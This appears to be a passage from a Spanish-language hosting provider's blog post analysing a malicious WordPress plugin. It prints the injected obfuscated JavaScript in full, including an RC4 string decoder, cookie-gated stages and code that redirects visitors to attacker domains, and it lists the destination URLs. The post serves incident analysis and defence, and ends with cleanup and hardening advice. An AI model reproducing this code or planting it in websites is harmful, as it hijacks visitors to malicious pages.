_0xd80b64;try{_0xd80b64=Function(_0xecd50d[0x7]+_0xecd50d[0x8]+_0xecd50d[0x9])();}catch(_0xc78626){_0xd80b64=window;};return _0xd80b64;};var _0x1a708e=_0x5a5e25();var _0x46b9e5=_0xecd50d[0xa];_0x1a708e[_0xecd50d[0xb]]||(_0x1a708e[_0xecd50d[0xb]]=function(_0xfb962){var _0xeff5b9=String(_0xfb962)[_0xecd50d[0xd]](/=+$/,_0xecd50d[0xc]);for(var _0x5d6d18=0x0,_0x55de3b,_0x529cad,_0x10a921=0x0,_0x18904f=_0xecd50d[0xc];_0x529cad=_0xeff5b9[_0xecd50d[0xe]](_0x10a921++);~_0x529cad&&(_0x55de3b=_0x5d6d18%0x4?_0x55de3b*0x40+_0x529cad:_0x529cad,_0x5d6d18++%0x4)?_0x18904f+=String[_0xecd50d[0xf]](0xff&_0x55de3b>>(-0x2*_0x5d6d18&0x6)):0x0){_0x529cad=_0x46b9e5[_0xecd50d[0x10]](_0x529cad);};return _0x18904f;});}());var _0x2abd80=function(_0x43a885,_0x105839){var _0x33620c=[],_0x2a0bcd=0x0,_0x4201f4,_0x5851eb=_0xecd50d[0xc],_0x54bd1e=_0xecd50d[0xc];_0x43a885=atob(_0x43a885);for(var _0x343db7=0x0,_0x108973=_0x43a885[_0xecd50d[0x11]];_0x343db7<_0x108973;_0x343db7++){_0x54bd1e+=_0xecd50d[0x12]+(_0xecd50d[0x14]+_0x43a885[_0xecd50d[0x16]](_0x343db7)[_0xecd50d[0x15]](0x10))[_0xecd50d[0x13]](-0x2);};_0x43a885=decodeURIComponent(_0x54bd1e);for(var _0x1407d3=0x0;_0x1407d3<0x100;_0x1407d3++){_0x33620c[_0x1407d3]=_0x1407d3;};for(_0x1407d3=0x0;_0x1407d3<0x100;_0x1407d3++){_0x2a0bcd=(_0x2a0bcd+_0x33620c[_0x1407d3]+_0x105839[_0xecd50d[0x16]](_0x1407d3%_0x105839[_0xecd50d[0x11]]))%0x100;_0x4201f4=_0x33620c[_0x1407d3];_0x33620c[_0x1407d3]=_0x33620c[_0x2a0bcd];_0x33620c[_0x2a0bcd]=_0x4201f4;};_0x1407d3=0x0;_0x2a0bcd=0x0;for(var _0x2315dc=0x0;_0x2315dc<_0x43a885[_0xecd50d[0x11]];_0x2315dc++){_0x1407d3=(_0x1407d3+0x1)%0x100;_0x2a0bcd=(_0x2a0bcd+_0x33620c[_0x1407d3])%0x100;_0x4201f4=_0x33620c[_0x1407d3];_0x33620c[_0x1407d3]=_0x33620c[_0x2a0bcd];_0x33620c[_0x2a0bcd]=_0x4201f4;_0x5851eb+=String[_0xecd50d[0xf]](_0x43a885[_0xecd50d[0x16]](_0x2315dc)^_0x33620c[(_0x33620c[_0x1407d3]+_0x33620c[_0x2a0bcd])%0x100]);};return 
_0x5851eb;};_0x1e6662[_0xecd50d[0x17]]=_0x2abd80;_0x1e6662[_0xecd50d[0x18]]={};_0x1e6662[_0xecd50d[0x6]]=!![];};var _0x36ed49=_0x1e6662[_0xecd50d[0x18]][_0x42fa08];if(_0x36ed49===undefined){if(_0x1e6662[_0xecd50d[0x19]]===undefined){_0x1e6662[_0xecd50d[0x19]]=!![];};_0x280aff=_0x1e6662[_0xecd50d[0x17]](_0x280aff,_0x105839);_0x1e6662[_0xecd50d[0x18]][_0x42fa08]=_0x280aff;}else{_0x280aff=_0x36ed49;};return _0x280aff;};var _0x53d8e8=String[_0x1e6662(_0xecd50d[0x1a],_0xecd50d[0x1b])](104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 115, 102, 101, 101, 100, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document[_0x1e6662(_0xecd50d[0x1c],_0xecd50d[0x1d])][_0xecd50d[0xd]](_0x53d8e8);window[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0x1e6662(_0xecd50d[0x1e],_0xecd50d[0x1f])]=_0x53d8e8;document[_0x1e6662(_0xecd50d[0x20],_0xecd50d[0x21])][_0xecd50d[0x22]]=_0x53d8e8;
}

// aASDFAAEAEHFGvF32(): redirect stage that the top-level dispatcher calls when all three
// marker cookies are already present. It takes no arguments and reads the global sdfgdfg,
// the URL string declared at the top of the script.
// Visible structure: a three-entry table of encrypted strings (_0x35c2) rotated in place,
// and a decoder (_0x4336) that base64-decodes an entry (installing an atob fallback if
// none exists), decrypts it with RC4 keyed by its second argument and caches the result.
// The three decoded names go into _0x241731 and drive the final statements:
//   document[n1][n0](sdfgdfg); window[n1][n2] = sdfgdfg; document[n1][n2] = sdfgdfg;
// Presumably n1 = "location", n0 = "replace", n2 = "href", matching the plain redirect in
// the dispatcher's final branch; confirm by decoding in an isolated environment.
function aASDFAAEAEHFGvF32(){
var _0x35c2=[‘\x77\x72\x70\x48\x4d\x38\x4b\x57\x54\x32\x37\x44\x71\x77\x3d\x3d’,’\x77\x72\x42\x79\x44\x58\x6f\x77\x41\x73\x4b\x43\x77\x34\x30\x3d’,’\x62\x54\x6e\x43\x6f\x33\x63\x3d’];(function(_0x5c8663,_0x5cd826){var _0x439316=function(_0x1cde76){while(–_0x1cde76){_0x5c8663[‘push’](_0x5c8663[‘shift’]());}};_0x439316(++_0x5cd826);}(_0x35c2,0x102));var _0x4336=function(_0x12ebc7,_0x1a4f1c){_0x12ebc7=_0x12ebc7-0x0;var _0x5a9adc=_0x35c2[_0x12ebc7];if(_0x4336[‘vdBqBT’]===undefined){(function(){var _0x183fa7=function(){var _0x327ef5;try{_0x327ef5=Function(‘return\x20(function()\x20’+'{}.constructor(\x22return\x20this\x22)(\x20)’+’);’)();}catch(_0x32d85b){_0x327ef5=window;}return _0x327ef5;};var _0x27cb86=_0x183fa7();var _0x309966=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;_0x27cb86[‘atob’]||(_0x27cb86[‘atob’]=function(_0x47bccb){var _0x28e3cb=String(_0x47bccb)[‘replace’](/=+$/,”);for(var _0x8b0d0a=0x0,_0x33a00b,_0x549265,_0x58df97=0x0,_0x5e880b=”;_0x549265=_0x28e3cb[‘charAt’](_0x58df97++);~_0x549265&&(_0x33a00b=_0x8b0d0a%0x4?_0x33a00b*0x40+_0x549265:_0x549265,_0x8b0d0a++%0x4)?_0x5e880b+=String[‘fromCharCode’](0xff&_0x33a00b>>(-0x2*_0x8b0d0a&0x6)):0x0){_0x549265=_0x309966[‘indexOf’](_0x549265);}return _0x5e880b;});}());var _0x434173=function(_0x107253,_0x1a4f1c){var _0x2c55ae=[],_0x284508=0x0,_0x23adb9,_0xba911b=”,_0x3daa82=”;_0x107253=atob(_0x107253);for(var _0x4909e6=0x0,_0x475e7d=_0x107253[‘length’];_0x4909e6<_0x475e7d;_0x4909e6++){_0x3daa82+=’%’+(’00’+_0x107253[‘charCodeAt’](_0x4909e6)[‘toString’](0x10))[‘slice’](-0x2);}_0x107253=decodeURIComponent(_0x3daa82);for(var _0x317088=0x0;_0x317088<0x100;_0x317088++){_0x2c55ae[_0x317088]=_0x317088;}for(_0x317088=0x0;_0x317088<0x100;_0x317088++){_0x284508=(_0x284508+_0x2c55ae[_0x317088]+_0x1a4f1c[‘charCodeAt’](_0x317088%_0x1a4f1c[‘length’]))%0x100;_0x23adb9=_0x2c55ae[_0x317088];_0x2c55ae[_0x317088]=_0x2c55ae[_0x284508];_0x2c55ae[_0x284508]=_0x23adb9;}_0x317088=0x0;_0x284508=0x0;for(var 
_0x5377f0=0x0;_0x5377f0<_0x107253[‘length’];_0x5377f0++){_0x317088=(_0x317088+0x1)%0x100;_0x284508=(_0x284508+_0x2c55ae[_0x317088])%0x100;_0x23adb9=_0x2c55ae[_0x317088];_0x2c55ae[_0x317088]=_0x2c55ae[_0x284508];_0x2c55ae[_0x284508]=_0x23adb9;_0xba911b+=String[‘fromCharCode’](_0x107253[‘charCodeAt’](_0x5377f0)^_0x2c55ae[(_0x2c55ae[_0x317088]+_0x2c55ae[_0x284508])%0x100]);}return _0xba911b;};_0x4336[‘GkSMau’]=_0x434173;_0x4336[‘pKigns’]={};_0x4336[‘vdBqBT’]=!![];}var _0x232be3=_0x4336[‘pKigns’][_0x12ebc7];if(_0x232be3===undefined){if(_0x4336[‘JBGAlj’]===undefined){_0x4336[‘JBGAlj’]=!![];}_0x5a9adc=_0x4336[‘GkSMau’](_0x5a9adc,_0x1a4f1c);_0x4336[‘pKigns’][_0x12ebc7]=_0x5a9adc;}else{_0x5a9adc=_0x232be3;}return _0x5a9adc;};var _0x241731=[_0x4336(‘0x0′,’\x48\x35\x63\x62’),_0x4336(‘0x1′,’\x42\x5b\x69\x70’),_0x4336(‘0x2′,’\x76\x57\x4d\x57’)];document[_0x241731[0x1]][_0x241731[0x0]](sdfgdfg);window[_0x241731[0x1]][_0x241731[0x2]]=sdfgdfg;document[_0x241731[0x1]][_0x241731[0x2]]=sdfgdfg;

}

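El código inyectado redirecciona al visitante a la URL  http://choisirfemme.tk/index/?4831537102803, que a su vez carga las diferentes webs que aparecen. Además, según las cookies pp0000011, pp0000012 y pp0000062 que el propio script va creando en el navegador, las visitas posteriores se envían a otros dos destinos que el listado construye a partir de códigos de carácter: hxxps://notifymepush[.]info/rs/1088?… y hxxps://click[.]newsfeed[.]support/esuznxifqk.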

Conclusión

Elige siempre un equipo de profesionales que pueda ayudarte urgentemente en caso de que en tu web ocurra este tipo de incidentes (Hosting Profesional WordPress Nova Internet). Si ya lo tienes, elimina inmediatamente el plugin de tu web; tras eliminarlo, conviene comprobar que no quede código inyectado en los ajustes que el plugin hubiera guardado en la base de datos.

Como venimos comentando en los últimos años con nuestros clientes, hay que ser bastante consciente de que tener una página en WordPress implica que tanto los plugins como el tema y el CMS deben estar adecuadamente actualizados y con mantenimiento continuo. Además, no está de más la aportación positiva que pudiera tener un WAF o firewall que filtre la entrada de llamadas, e incluso cerrar determinados países, para que no tengan acceso a este tipo de agujeros que generan más de un dolor de cabeza a la imagen de tu empresa.